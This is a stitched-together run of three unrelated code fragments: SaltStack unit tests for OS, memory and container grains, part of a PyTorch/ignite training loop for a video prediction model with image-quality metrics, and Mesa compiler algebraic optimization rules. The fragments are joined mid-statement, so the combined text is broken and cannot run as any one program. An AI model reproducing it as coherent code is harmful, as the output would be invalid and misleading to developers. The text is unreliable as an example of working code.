'Windows Server 2019 Datacenter': '2019Server',
'Windows Server 2016 Essentials': '2016Server',
'Windows Server 2016 Standard': '2016Server',
'Windows Server 2016 Datacenter': '2016Server',
'Windows Server 2012 R2 Foundation': '2012ServerR2',
'Windows Server 2012 R2 Essentials': '2012ServerR2',
'Windows Server 2012 R2 Standard': '2012ServerR2',
'Windows Server 2012 R2 Datacenter': '2012ServerR2',
'Windows Server 2012 Foundation': '2012Server',
'Windows Server 2012 Essentials': '2012Server',
'Windows Server 2012 Standard': '2012Server',
'Windows Server 2012 Datacenter': '2012Server',
'Windows MultiPoint Server 2012': '2012Server',
'Windows Small Business Server 2011': '2011Server',
'Windows MultiPoint Server 2011': '2011Server',
'Windows Home Server 2011': '2011Server',
'Windows MultiPoint Server 2010': '2010Server',
'Windows Server 2008 R2 Foundation': '2008ServerR2',
'Windows Server 2008 R2 Standard': '2008ServerR2',
'Windows Server 2008 R2 Enterprise': '2008ServerR2',
'Windows Server 2008 R2 Datacenter': '2008ServerR2',
'Windows Server 2008 R2 for Itanium-based Systems': '2008ServerR2',
'Windows Web Server 2008 R2': '2008ServerR2',
'Windows Storage Server 2008 R2': '2008ServerR2',
'Windows HPC Server 2008 R2': '2008ServerR2',
'Windows Server 2008 Standard': '2008Server',
'Windows Server 2008 Enterprise': '2008Server',
'Windows Server 2008 Datacenter': '2008Server',
'Windows Server 2008 for Itanium-based Systems': '2008Server',
'Windows Server Foundation 2008': '2008Server',
'Windows Essential Business Server 2008': '2008Server',
'Windows HPC Server 2008': '2008Server',
'Windows Small Business Server 2008': '2008Server',
'Windows Storage Server 2008': '2008Server',
'Windows Web Server 2008': '2008Server'
}
for caption in versions:
version = core._windows_os_release_grain(caption, 1)
self.assertEqual(
version,
versions[caption],
'version: {0}\n'
'found: {1}\n'
'caption: {2}'.format(version, versions[caption], caption)
)
embedded_versions = {
'Windows Embedded 8.1 Industry Pro': '8.1',
'Windows Embedded 8 Industry Pro': '8',
'Windows POSReady 7': '7',
'Windows Embedded Standard 7': '7',
'Windows Embedded POSReady 2009': '2009',
'Windows Embedded Standard 2009': '2009',
'Windows XP Embedded': 'XP',
}
for caption in embedded_versions:
version = core._windows_os_release_grain(caption, 1)
self.assertEqual(
version,
embedded_versions[caption],
'{0} != {1}\n'
'version: {0}\n'
'found: {1}\n'
'caption: {2}'.format(version, embedded_versions[caption], caption)
)
# Special Cases
# Windows Embedded Standard is Windows 7
caption = 'Windows Embedded Standard'
with patch('platform.release', MagicMock(return_value='7')):
version = core._windows_os_release_grain(caption, 1)
self.assertEqual(version, '7')
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_linux_memdata(self):
'''
Test memdata on Linux systems
'''
_proc_meminfo = textwrap.dedent('''\
MemTotal: 16277028 kB
SwapTotal: 4789244 kB''')
with patch('salt.utils.files.fopen', mock_open(read_data=_proc_meminfo)):
memdata = core._linux_memdata()
self.assertEqual(memdata.get('mem_total'), 15895)
self.assertEqual(memdata.get('swap_total'), 4676)
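            # The expected values above are consistent with an integer kB -> MB conversion:
            # 16277028 // 1024 == 15895 and 4789244 // 1024 == 4676.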
@skipIf(salt.utils.platform.is_windows(), 'System is Windows')
def test_bsd_memdata(self):
'''
Test to memdata on *BSD systems
'''
_path_exists_map = {}
_path_isfile_map = {}
_cmd_run_map = {
'freebsd-version -u': '10.3-RELEASE',
'/sbin/sysctl -n hw.physmem': '2121781248',
'/sbin/sysctl -n vm.swap_total': '419430400'
}
path_exists_mock = MagicMock(side_effect=lambda x: _path_exists_map[x])
path_isfile_mock = MagicMock(
side_effect=lambda x: _path_isfile_map.get(x, False)
)
cmd_run_mock = MagicMock(
side_effect=lambda x: _cmd_run_map[x]
)
empty_mock = MagicMock(return_value={})
mock_freebsd_uname = ('FreeBSD',
'freebsd10.3-hostname-8148',
'10.3-RELEASE',
'FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016 <EMAIL>:/usr/obj/usr/src/sys/GENERIC',
'amd64',
'amd64')
with patch('platform.uname',
MagicMock(return_value=mock_freebsd_uname)):
with patch.object(salt.utils.platform, 'is_linux',
MagicMock(return_value=False)):
with patch.object(salt.utils.platform, 'is_freebsd',
MagicMock(return_value=True)):
# Skip the first if statement
with patch.object(salt.utils.platform, 'is_proxy',
MagicMock(return_value=False)):
# Skip the init grain compilation (not pertinent)
with patch.object(os.path, 'exists', path_exists_mock):
with patch('salt.utils.path.which') as mock:
mock.return_value = '/sbin/sysctl'
# Make a bunch of functions return empty dicts,
# we don't care about these grains for the
# purposes of this test.
with patch.object(
core,
'_bsd_cpudata',
empty_mock):
with patch.object(
core,
'_hw_data',
empty_mock):
with patch.object(
core,
'_virtual',
empty_mock):
with patch.object(
core,
'_ps',
empty_mock):
# Mock the osarch
with patch.dict(
core.__salt__,
{'cmd.run': cmd_run_mock}):
os_grains = core.os_data()
self.assertEqual(os_grains.get('mem_total'), 2023)
self.assertEqual(os_grains.get('swap_total'), 400)
@skipIf(salt.utils.platform.is_windows(), 'System is Windows')
def test_docker_virtual(self):
'''
Test if virtual grains are parsed correctly in Docker.
'''
with patch.object(os.path, 'isdir', MagicMock(return_value=False)):
with patch.object(os.path,
'isfile',
MagicMock(side_effect=lambda x: True if x == '/proc/1/cgroup' else False)):
for cgroup_substr in (':/system.slice/docker', ':/docker/',
':/docker-ce/'):
cgroup_data = \
'10:memory{0}a_long_sha256sum'.format(cgroup_substr)
log.debug(
'Testing Docker cgroup substring \'%s\'', cgroup_substr)
with patch('salt.utils.files.fopen', mock_open(read_data=cgroup_data)):
with patch.dict(core.__salt__, {'cmd.run_all': MagicMock()}):
grains = core._virtual({'kernel': 'Linux'})
self.assertEqual(
grains.get('virtual_subtype'),
'Docker'
)
self.assertEqual(
grains.get('virtual'),
'container',
)
@skipIf(salt.utils.platform.is_windows(), 'System is Windows')
def test_lxc_virtual(self):
'''
Test if virtual grains are parsed correctly in LXC.
'''
with patch.object(os.path, 'isdir', MagicMock(return_value=False)):
with patch.object(os.path,
'isfile',
MagicMock(side_effect=lambda x: True if x == '/proc/1/cgroup' else False)):
cgroup_data = '10:memory:/lxc/a_long_sha256sum'
with patch('salt.utils.files.fopen', mock_open(read_data=cgroup_data)):
with patch.dict(core.__salt__, {'cmd.run_all': MagicMock()}):
grains = core._virtual({'kernel': 'Linux'})
self.assertEqual(
grains.get('virtual_subtype'),
'LXC'
)
and self.config["testing"]["metrics_on_patches"]:
x_seq_hat = get_patches(x_seq_hat,weights,self.config["data"],test_dataset.weight_value_flow, logger=self.logger)
x_seq_gt = get_patches(x_seq_gt, weights, self.config["data"], test_dataset.weight_value_flow, logger=self.logger)
sigmas_gt = []
ll_loss_dyn = []
rec_imgs = []
for n in range(seq_len):
x_hat_tn, s_tn, *_ = net(x_seq_gt[:, n], x_seq_gt[:, n], poke, len=0)
sigmas_gt.append(s_tn)
rec_imgs.append(x_hat_tn)
ll_dyn_n = vgg_loss_agg(self.vgg, x_seq_gt[:, n], x_seq_hat[:, n])
ll_loss_dyn.append(ll_dyn_n)
ll_loss_tk_eval = torch.stack(ll_loss_dyn,dim=0).mean()
rec_imgs = torch.stack(rec_imgs,1)
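# Optional norm loss below: per sample, the mean magnitude of the nonzero poke
# vectors is compared against the norm of the predicted latent shift mu_delta
# (squared error, averaged over the batch).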
if self.use_norm_loss:
poke_norms = []
for p in poke:
magns = p.norm(dim=0)
ids = magns.nonzero(as_tuple=True)
if ids[0].shape[0] > 0:
poke_norms.append(magns[ids].mean().unsqueeze(0))
else:
poke_norms.append(torch.zeros(1).cuda(self.all_devices[0]))
poke_norms = torch.cat(poke_norms, 0)
norm_loss = ((poke_norms - mu_delta.reshape(poke_norms.shape[0], -1).norm(dim=-1)) ** 2).mean()
out_dict.update({"norm_loss": norm_loss.item()})
if weights is not None and self.config["testing"]["metrics_on_patches"]:
rec_imgs = get_patches(rec_imgs, weights, self.config["data"], test_dataset.weight_value_flow, logger=self.logger)
# apply inception model for fid calculation at time t+k
for t in range(x_seq_gt.shape[1]):
real_features_t = self.inception_model(x_seq_gt[:, t]).cpu().numpy()
fake_features_t = self.inception_model(x_seq_hat[:, t]).cpu().numpy()
if t not in self.fid_feats_fake_per_frame:
self.fid_feats_fake_per_frame.update({t: fake_features_t})
self.fid_feats_real_per_frame.update({t: real_features_t})
else:
self.fid_feats_fake_per_frame[t] = np.concatenate([self.fid_feats_fake_per_frame[t], fake_features_t], axis=0)
self.fid_feats_real_per_frame[t] = np.concatenate([self.fid_feats_real_per_frame[t], real_features_t], axis=0)
# evaluate training losses
# ll_loss_tk_eval = vgg_loss_agg(self.vgg, x_tk, x_tk_hat)
ll_loss_t_i_eval = vgg_loss_agg(self.vgg, x_t, x_t_hat)
dyn_losses = []
for s_tk, s_hat_tk in zip(sigmas_gt, sigmas_hat):
dyn_losses.append(latent_dynamics_loss(s_hat_tk, s_tk, []))
latent_loss_dyn_eval = torch.stack(dyn_losses).mean()
out_dict.update({"vgg_loss_dyn_eval": ll_loss_tk_eval.item(), "loss_dis_i_eval": ll_loss_t_i_eval.item(), "latent_loss_dyn_eval": latent_loss_dyn_eval.item()})
#if self.pixel_decoder_loss:
#x_t_hat_dec = net.dec(sigma_t, alpha)
#loss_dec_dyn = (vgg_loss_agg(self.vgg, x_t_hat_dec, x_tk_hat) - vgg_loss_agg(self.vgg, x_t, x_tk)) ** 2
loss_dec_dyn = []
for n in range(seq_len - 1):
loss_dec_dyn_tn = pixel_dynamics_loss(x_seq_gt[:, n], x_seq_gt[:, n + 1], rec_imgs[:,n], x_seq_hat[:, n + 1])
loss_dec_dyn.append(loss_dec_dyn_tn)
loss_dec_dyn = torch.stack(loss_dec_dyn, dim=0).mean()
out_dict.update({"pixel_loss_dec_eval": loss_dec_dyn.item()})
# compute metrics
ssim_t = ssim_lightning(x_t, x_t_hat)
psnr_t = psnr_lightning(x_t, x_t_hat)
lpips_t = metric_lpips(x_t,x_t_hat, self.lpips_fn, reduce=False)
ssim_tk, ssim_per_frame = ssim_lightning(x_seq_gt, x_seq_hat, return_per_frame=True)
psnr_tk, psnr_per_frame = psnr_lightning(x_seq_gt, x_seq_hat, return_per_frame=True)
lpips_avg, lpips_per_frame = metric_lpips(x_seq_gt, x_seq_hat,self.lpips_fn,reduce=False,return_per_frame=True)
# ssim_pl, ssim_pl_per_frame = ssim_lightning(x_seq_gt,x_seq_hat,return_per_frame=True)
# psnr_pl, psnr_pl_per_frame = psnr_lightning(x_seq_gt, x_seq_hat, return_per_frame=True)
# append to arrays
self.lpips["t"].append(lpips_t)
self.psnrs["t"].append(psnr_t)
self.ssims["t"].append(ssim_t)
self.psnrs["tk"].append(psnr_tk)
self.ssims["tk"].append(ssim_tk)
self.lpips["tk"].append(lpips_avg)
#self.ssims["pl"].append(ssim_pl)
#self.psnrs["pl"].append(psnr_pl)
# append the values of the respective sequence length
[self.ssims_per_frame[key].append(ssim_per_frame[key]) if key in self.ssims_per_frame else self.ssims_per_frame.update({key:[ssim_per_frame[key]]}) for key in ssim_per_frame]
[self.psnrs_per_frame[key].append(psnr_per_frame[key]) if key in self.psnrs_per_frame else self.psnrs_per_frame.update({key:[psnr_per_frame[key]]}) for key in psnr_per_frame]
[self.lpips_per_frame[key].append(lpips_per_frame[key]) if key in self.lpips_per_frame else self.lpips_per_frame.update({key:[lpips_per_frame[key]]}) for key in lpips_per_frame]
#[self.ssims_per_frame_pl[key].append(ssim_pl_per_frame[key]) if key in self.ssims_per_frame_pl else self.ssims_per_frame_pl.update({key: [ssim_pl_per_frame[key]]}) for key in ssim_pl_per_frame]
#[self.psnrs_per_frame_pl[key].append(psnr_pl_per_frame[key]) if key in self.psnrs_per_frame_pl else self.psnrs_per_frame_pl.update({key: [psnr_pl_per_frame[key]]}) for key in psnr_pl_per_frame]
return out_dict
# test_it steps are performed while generating test images, so n_test_img is the overall number divided by the number of test iterations
n_test_img = int(self.config["testing"]["n_test_img"] // self.config["testing"]["test_it"])
def eval_visual(engine, eval_batch):
net.eval()
with torch.no_grad():
# prepare data
if test_dataset.flow_weights:
poke = eval_batch["poke"][0].cuda(self.all_devices[0])
weights = eval_batch["poke"][1]
else:
poke = eval_batch["poke"].cuda(self.all_devices[0])
x_t = eval_batch["images"][:, 0].cuda(self.all_devices[0])
x_seq_gt = eval_batch["images"][:, 1:].cuda(self.all_devices[0])
flow = eval_batch["flow"]
if self.config["architecture"]["disentanglement"]:
shape_img = eval_batch["img_aT"].cuda(self.all_devices[0])
else:
shape_img = x_t
seq_len = x_seq_gt.shape[1]
x_seq_hat, *_ = net(x_t,x_t, poke, len=seq_len)
x_t_hat , *_ = net(x_seq_gt[:,-1],shape_img,poke,len=0)
grid_dis = make_img_grid(x_seq_gt[:,-1],shape_img, x_t_hat,x_t, n_logged=n_test_img)
grid_dyn = make_flow_grid(x_t, poke, x_seq_hat[:,-1], x_seq_gt[:,-1], n_logged=n_test_img, flow=flow)
seq_vis_hat = torch.cat([x_t.unsqueeze(1), x_seq_hat], 1)
seq_vis_gt = torch.cat([x_t.unsqueeze(1), x_seq_gt], 1)
grid_anim = make_video(x_t,poke,seq_vis_hat,seq_vis_gt,n_logged=n_test_img,flow=flow)
it = engine.state.iteration
log_dict = {"Last Frame Comparison Test data": wandb.Image(grid_dyn, caption=f"Last frames test grid #{it}."),
"Disentanglement Grid Test Data": wandb.Image(grid_dis, caption=f"Test grid disentanglement #{it}."),
"Video Grid Test Data": wandb.Video(grid_anim,caption=f"Test Video Grid #{it}.",fps=5)}
if self.config["testing"]["eval_app_transfer"]:
app_img_unrelated = eval_batch["app_img_random"].cuda(self.all_devices[0])
x_transferred, *_ = net(app_img_unrelated,x_t, poke,len=0)
transfer_grid = make_img_grid(app_img_unrelated,x_t,x_transferred)
log_dict.update({"Appearance transfer grid Test Data": wandb.Image(transfer_grid, caption=f"Test_grid appearance transfer #{it}")})
wandb.log(log_dict)
return None
self.logger.info("Initialize engines...")
trainer = Engine(train_step)
evaluator = Engine(eval_step)
test_img_generator = Engine(eval_visual)
self.logger.info("Finish engine initialization...")
# checkpointing
ckpt_handler = ModelCheckpoint(self.dirs["ckpt"], "reg_ckpt", n_saved=10, require_empty=False)
if self.config["training"]["two_stage"]:
save_dict = {"model": net, "optimizer_dis": optimizer_dis, "optimizer_dyn": optimizer_dyn}
else:
save_dict = {"model": net, "optimizer_dyn": optimizer_dyn}
trainer.add_event_handler(Events.ITERATION_COMPLETED(every=self.config["testing"]["ckpt_intervall"]),
ckpt_handler,
save_dict)
if self.use_gan:
ckpt_handler_disc = ModelCheckpoint(self.dirs["ckpt"], gan_trainer.load_key, n_saved=10, require_empty=False)
save_dict_disc = {"model": gan_trainer.disc, "optimizer": gan_trainer.disc_opt}
trainer.add_event_handler(Events.ITERATION_COMPLETED(every=self.config["testing"]["ckpt_intervall"]),
ckpt_handler_disc,
save_dict_disc)
if self.use_temp_disc:
ckpt_handler_disc_temp = ModelCheckpoint(self.dirs["ckpt"], gan_trainer_temp.load_key, n_saved=10, require_empty=False)
save_dict_disc_temp = {"model": gan_trainer_temp.disc, "optimizer": gan_trainer_temp.disc_opt}
trainer.add_event_handler(Events.ITERATION_COMPLETED(every=self.config["testing"]["ckpt_intervall"]),
ckpt_handler_disc_temp,
save_dict_disc_temp)
pbar = ProgressBar(ascii=True)
pbar.attach(trainer, output_transform=lambda x: x)
pbar.attach(evaluator, output_transform=lambda x: x)
# reduce the learning rate of the decoder for the image reconstruction task, so that the model focuses more on t --> tk
if self.config["training"]["two_stage"]:
@trainer.on(Events.ITERATION_COMPLETED)
def update_lr(engine):
self.lr_dec_t = lr_dec_rec(engine.state.iteration)
for g in optimizer_dis.param_groups:
if g["name"] == "decoder":
g["lr"] = self.lr_dec_t
@trainer.on(Events.ITERATION_COMPLETED(every=self.config["testing"]["log_intervall"]))
def log(engine):
it = engine.state.iteration
wandb.log({"iteration": it})
# log losses
for key in engine.state.output:
wandb.log({key: engine.state.output[key]})
data = engine.state.batch
if test_dataset.flow_weights:
poke = data["poke"][0].cuda(self.all_devices[0])
else:
poke = data["poke"].cuda(self.all_devices[0])
x_t = data["images"][:, 0].cuda(self.all_devices[0])
x_seq_gt = data["images"][:, 1:].cuda(self.all_devices[0])
if self.config["architecture"]["disentanglement"]:
shape_img = data["img_aT"].cuda(self.all_devices[0])
else:
shape_img = x_t
net.eval()
seq_len = x_seq_gt.shape[1]
with torch.no_grad():
x_seq_hat, *_ = net(x_t, x_t, poke, len=seq_len)
x_t_hat, *_ = net(x_seq_gt[:,-1], shape_img, poke,len=0)
#x_t_hat_e, *_ = net(img_aT, img_sT, poke)
grid_dis_i = make_img_grid(x_seq_gt[:,-1], shape_img, x_t_hat, x_t, n_logged=n_test_img)
grid_dyn = make_flow_grid(x_t, poke, x_seq_hat[:,-1], x_seq_gt[:,-1], n_logged=n_test_img)
seq_vis_hat = torch.cat([x_t.unsqueeze(1),x_seq_hat],1)
seq_vis_gt = torch.cat([x_t.unsqueeze(1), x_seq_gt], 1)
grid_anim = make_video(x_t,poke,seq_vis_hat,seq_vis_gt,n_logged=n_test_img)
wandb.log({"Last Frame Comparison Train Data": wandb.Image(grid_dyn, caption=f"Last frames train grid after {it} train steps."),
"Disentanglement Grid Invariance Train Data": wandb.Image(grid_dis_i, caption=f"Invariance Disentanglement Grid on train set after {it} train steps."),
"Video Grid Train Data": wandb.Video(grid_anim, caption=f"Train Video Grid after {it} train steps",fps=5)})
#"Disentanglement Grid Equivariance Train Data": wandb.Image(grid_dis_e, caption=f"Eqiuvariance Disentanglement Grid on train set after {it} train steps.")
self.logger.info("Initialize metrics...")
# compute loss average over epochs
# Average(output_transform=lambda x: x["loss_dis"]).attach(trainer, "loss_dis-epoch_avg")
Average(output_transform=lambda x: x["loss_dis"]).attach(trainer, "loss_dis-epoch_avg")
Average(output_transform=lambda x: x["vgg_loss_dyn"]).attach(trainer, "vgg_loss_dyn-epoch_avg")
Average(output_transform=lambda x: x["latent_loss_dyn"]).attach(trainer, "latent_loss_dyn-epoch_avg")
if self.config["architecture"]["disentanglement"]:
Average(output_transform=lambda x: x["style_loss"]).attach(trainer, "style_loss-epoch_avg")
Average(output_transform=lambda x: x["style_loss_eval"]).attach(evaluator, "style_loss_eval")
if self.use_norm_loss:
Average(output_transform=lambda x: x["norm_loss"]).attach(trainer, "norm_loss-epoch_avg")
Average(output_transform=lambda x: x["norm_loss"]).attach(evaluator, "norm_loss_eval")
if self.config["architecture"]["dynamics_var"]:
Average(output_transform=lambda x: x["kl_dyn"]).attach(trainer, "kl_dyn_loss-epoch_avg")
if self.use_temp_disc or self.use_gan:
def gan_training_started(engine,epoch, key="gan"):
return engine.state.iteration >= self.config[key]["start_iteration"]
if self.use_gan:
use_patchgan_metrics = MetricUsage(started=Events.EPOCH_STARTED(event_filter=gan_training_started),
completed=Events.EPOCH_COMPLETED(event_filter=gan_training_started),
iteration_completed=Events.ITERATION_COMPLETED(event_filter=gan_training_started))
# gan losses
Average(output_transform=lambda x: x["loss_gen_patch"]).attach(trainer, "loss_gen_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["loss_fmap_patch"]).attach(trainer, "loss_fmap_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["loss_disc_patch"]).attach(trainer, "loss_disc_patch-epoch_avg",usage=use_patchgan_metrics)
#if self.config["gan"]["gp_weight"] > 0:
Average(output_transform=lambda x: x["loss_gp_patch"]).attach(trainer, "loss_gp_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["p_""true_patch"]).attach(trainer, "p_true_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["p_fake_patch"]).attach(trainer, "p_fake_patch-epoch_avg",usage=use_patchgan_metrics)
@trainer.on(Events.EPOCH_COMPLETED(event_filter=gan_training_started))
def gan_stuff(engine):
gan_trainer.disc_scheduler.step()
if self.use_temp_disc:
use_tmpgan_metrics = MetricUsage(started=Events.EPOCH_STARTED(event_filter=partial(gan_training_started,key="gan_temp")),
completed=Events.EPOCH_COMPLETED(event_filter=partial(gan_training_started,key="gan_temp")),
iteration_completed=Events.ITERATION_COMPLETED(event_filter=partial(gan_training_started,key="gan_temp")))
# gan losses
Average(output_transform=lambda x: x["loss_gen_temp"]).attach(trainer, "loss_gen_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["loss_fmap_temp"]).attach(trainer, "loss_fmap_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["loss_disc_temp"]).attach(trainer, "loss_disc_temp-epoch_avg",usage=use_tmpgan_metrics)
#if self.config["gan"]["gp_weight"] > 0:
Average(output_transform=lambda x: x["loss_gp_temp"]).attach(trainer, "loss_gp_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["p_true_temp"]).attach(trainer, "p_true_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["p_fake_temp"]).attach(trainer, "p_fake_temp-epoch_avg",usage=use_tmpgan_metrics)
@trainer.on(Events.EPOCH_COMPLETED(event_filter=gan_training_started))
def temp_disc_stuff(engine):
gan_trainer_temp.disc_scheduler.step()
# if self.pixel_decoder_loss:
Average(output_transform=lambda x: x["pixel_loss_dec"]).attach(trainer, "pixel_loss_dec-epoch_avg")
Average(output_transform=lambda x: x["pixel_loss_dec_eval"]).attach(evaluator, "pixel_loss_dec_eval")
# evaluation losses
Average(output_transform=lambda x: x["vgg_loss_dyn_eval"]).attach(evaluator, "vgg_loss_dyn_eval")
Average(output_transform=lambda x: x["loss_dis_i_eval"]).attach(evaluator, "loss_dis_i_eval")
Average(output_transform=lambda x: x["latent_loss_dyn_eval"]).attach(evaluator, "latent_loss_dyn_eval")
self.logger.info("Finish metric initialization.")
@trainer.on(Events.EPOCH_COMPLETED(every=self.config["testing"]["n_epoch_metrics"]))
def metrics(engine):
# move the inception and lpips models to gpu in eval mode for metric computation
self.inception_model.eval()
self.inception_model.cuda(self.all_devices[0])
self.lpips_fn.cuda(self.all_devices[0])
self.lpips_fn.eval()
if self.use_temp_disc:
gan_trainer_temp.disc.cpu()
if self.use_gan:
gan_trainer.disc.cpu()
# compute metrics over an epoch
self.logger.info(f"Computing metrics after epoch #{engine.state.epoch}")
bs = 20 if self.is_debug else (int(8000 / eval_sampler.batch_size) if len(test_dataset) > 8000 else len(eval_loader))
evaluator.run(eval_loader, max_epochs=1, epoch_length=bs)
[wandb.log({key: evaluator.state.metrics[key]}) for key in evaluator.state.metrics]
# compute metrics
ssim_t = np.mean(np.stack(self.ssims["t"], axis=0))
psnr_t = np.mean(np.stack(self.psnrs["t"], axis=0))
lpips_t = np.mean(np.concatenate(self.lpips["t"], axis=0))
ssim_tk = np.mean(np.stack(self.ssims["tk"], axis=0))
psnr_tk = np.mean(np.stack(self.psnrs["tk"], axis=0))
lpips_avg = np.mean(np.concatenate(self.lpips["tk"], axis=0))
self.lpips_avg = lpips_avg
fid_per_frame = {}
for key in tqdm(self.fid_feats_real_per_frame, desc="Computing FID per frame"):
fid_per_frame[key] = metric_fid(self.fid_feats_real_per_frame[key], self.fid_feats_fake_per_frame[key])
# fid_tk = metric_fid(self.features_real_fid["tk"], self.features_fake_fid["tk"])
fid_avg = np.mean([fid_per_frame[key] for key in fid_per_frame])
log_dict = {"ssim-t": ssim_t, "psnr-t": psnr_t, "fid-avg": fid_avg, "lpips-t": lpips_t,"ssim-tk": ssim_tk, "psnr-tk": psnr_tk, "lpips-avg": lpips_avg}
# add histograms for per-frame-metrics
self.lpips_per_frame = {key: np.concatenate(self.lpips_per_frame[key], axis=0).mean() for key in self.lpips_per_frame}
self.ssims_per_frame = {key: np.stack(self.ssims_per_frame[key], axis=0).mean() for key in self.ssims_per_frame}
self.psnrs_per_frame = {key: np.stack(self.psnrs_per_frame[key], axis=0).mean() for key in self.psnrs_per_frame}
# self.ssims_per_frame_pl = {key: np.stack(self.ssims_per_frame_pl[key], axis=0).mean() for key in self.ssims_per_frame_pl}
# self.psnrs_per_frame_pl = {key: np.stack(self.psnrs_per_frame_pl[key], axis=0).mean() for key in self.psnrs_per_frame_pl}
x = [k+1 for k in self.lpips_per_frame]
make_plot(x,list(self.lpips_per_frame.values()),"LPIPS of predicted frames", ylabel="Average LPIPS",)
make_plot(x, list(self.ssims_per_frame.values()), "SSIM of predicted frames", ylabel="Average SSIM",)
make_plot(x, list(self.psnrs_per_frame.values()), "PSNR of predicted frames", ylabel="Average PSNR",)
make_plot(x, list(fid_per_frame.values()), "FIDs of predicted frames", ylabel="FID")
wandb.log(log_dict)
# clear collection arrays
self.__clear_metric_arrs()
self.inception_model.cpu()
self.lpips_fn.cpu()
if self.use_temp_disc:
gan_trainer_temp.disc.cuda(self.all_devices[0])
if self.use_gan:
gan_trainer.disc.cuda(self.all_devices[0])
@trainer.on(Events.ITERATION_COMPLETED(every=self.config["testing"]["test_img_intervall"]))
def make_test_grid(engine):
test_img_generator.run(test_loader, max_epochs=1, epoch_length=self.config["testing"]["test_it"])
@trainer.on(Events.EPOCH_COMPLETED)
def log_train_avg(engine):
wandb.log({"epoch": engine.state.epoch})
[wandb.log({key: engine.state.metrics[key]}) for key in engine.state.metrics]
# also perform scheduler step
if self.config["training"]["two_stage"]:
scheduler_dis.step()
scheduler_dyn.step()
def score_fn(engine):
assert self.lpips_avg is not None
return -self.lpips_avg
# define best ckpt
best_ckpt_handler = ModelCheckpoint(self.dirs["ckpt"],filename_prefix="ckpt_metric" ,score_function=score_fn,score_name="lpips",n_saved=5,require_empty=False)
trainer.add_event_handler(Events.EPOCH_COMPLETED(every=self.config["testing"]["n_epoch_metrics"]),best_ckpt_handler,save_dict)
@trainer.on(Events.STARTED)
def set_start_it(engine):
self.logger.info(f'Engine starting from iteration {start_it}, epoch {start_epoch}')
engine.state.iteration = start_it
engine.state.epoch = start_epoch
# run everything
n_step_per_epoch = 10 if self.is_debug else len(train_loader)
self.logger.info("Start training...")
trainer.run(train_loader, max_epochs=n_epoch_overall, epoch_length=n_step_per_epoch)
self.logger.info("End training.")
def test(self):
from
b, c, d), a), 'options->lower_flrp{}'.format(s)),
(('~flrp@{}'.format(s), a, ('fmul(is_used_once)', a, b), c), ('fmul', ('flrp', 1.0, b, c), a), 'options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), ('fmul', a, ('fadd', 1.0, ('fneg', c))), ('fmul', b, c)), ('flrp', a, b, c), '!options->lower_flrp{}'.format(s)),
# These are the same as the previous three rules, but it depends on
# 1-fsat(x) <=> fsat(1-x). See below.
(('~fadd@{}'.format(s), ('fmul', a, ('fsat', ('fadd', 1.0, ('fneg', c)))), ('fmul', b, ('fsat', c))), ('flrp', a, b, ('fsat', c)), '!options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), a, ('fmul', c, ('fadd', b, ('fneg', a)))), ('flrp', a, b, c), '!options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), ('fmul', a, ('fadd', 1.0, ('fneg', ('b2f', 'c@1')))), ('fmul', b, ('b2f', c))), ('bcsel', c, b, a), 'options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), a, ('fmul', ('b2f', 'c@1'), ('fadd', b, ('fneg', a)))), ('bcsel', c, b, a), 'options->lower_flrp{}'.format(s)),
# 1 - ((1 - a) * (1 - b))
# 1 - (1 - a - b + a*b)
# 1 - 1 + a + b - a*b
# a + b - a*b
# a + b*(1 - a)
# b*(1 - a) + 1*a
# flrp(b, 1, a)
(('~fadd@{}'.format(s), 1.0, ('fneg', ('fmul', ('fadd', 1.0, ('fneg', a)), ('fadd', 1.0, ('fneg', b))))), ('flrp', b, 1.0, a), '!options->lower_flrp{}'.format(s)),
])
optimizations.extend([
(('~flrp', ('fmul(is_used_once)', a, b), ('fmul(is_used_once)', a, c), d), ('fmul', ('flrp', b, c, d), a)),
(('~flrp', a, 0.0, c), ('fadd', ('fmul', ('fneg', a), c), a)),
(('ftrunc', a), ('bcsel', ('flt', a, 0.0), ('fneg', ('ffloor', ('fabs', a))), ('ffloor', ('fabs', a))), 'options->lower_ftrunc'),
(('ffloor', a), ('fsub', a, ('ffract', a)), 'options->lower_ffloor'),
(('fadd', a, ('fneg', ('ffract', a))), ('ffloor', a), '!options->lower_ffloor'),
(('ffract', a), ('fsub', a, ('ffloor', a)), 'options->lower_ffract'),
(('fceil', a), ('fneg', ('ffloor', ('fneg', a))), 'options->lower_fceil'),
(('ffma@16', a, b, c), ('fadd', ('fmul', a, b), c), 'options->lower_ffma16'),
(('ffma@32', a, b, c), ('fadd', ('fmul', a, b), c), 'options->lower_ffma32'),
(('ffma@64', a, b, c), ('fadd', ('fmul', a, b), c), 'options->lower_ffma64'),
# Always lower inexact ffma, because it will be fused back by late optimizations (nir_opt_algebraic_late).
(('~ffma@16', a, b, c), ('fadd', ('fmul', a, b), c), 'options->fuse_ffma16'),
(('~ffma@32', a, b, c), ('fadd', ('fmul', a, b), c), 'options->fuse_ffma32'),
(('~ffma@64', a, b, c), ('fadd', ('fmul', a, b), c), 'options->fuse_ffma64'),
(('~fmul', ('fadd', ('iand', ('ineg', ('b2i', 'a@bool')), ('fmul', b, c)), '#d'), '#e'),
('bcsel', a, ('fmul', ('fadd', ('fmul', b, c), d), e), ('fmul', d, e))),
(('fdph', a, b), ('fdot4', ('vec4', 'a.x', 'a.y', 'a.z', 1.0), b), 'options->lower_fdph'),
(('fdot4', ('vec4', a, b, c, 1.0), d), ('fdph', ('vec3', a, b, c), d), '!options->lower_fdph'),
(('fdot4', ('vec4', a, 0.0, 0.0, 0.0), b), ('fmul', a, b)),
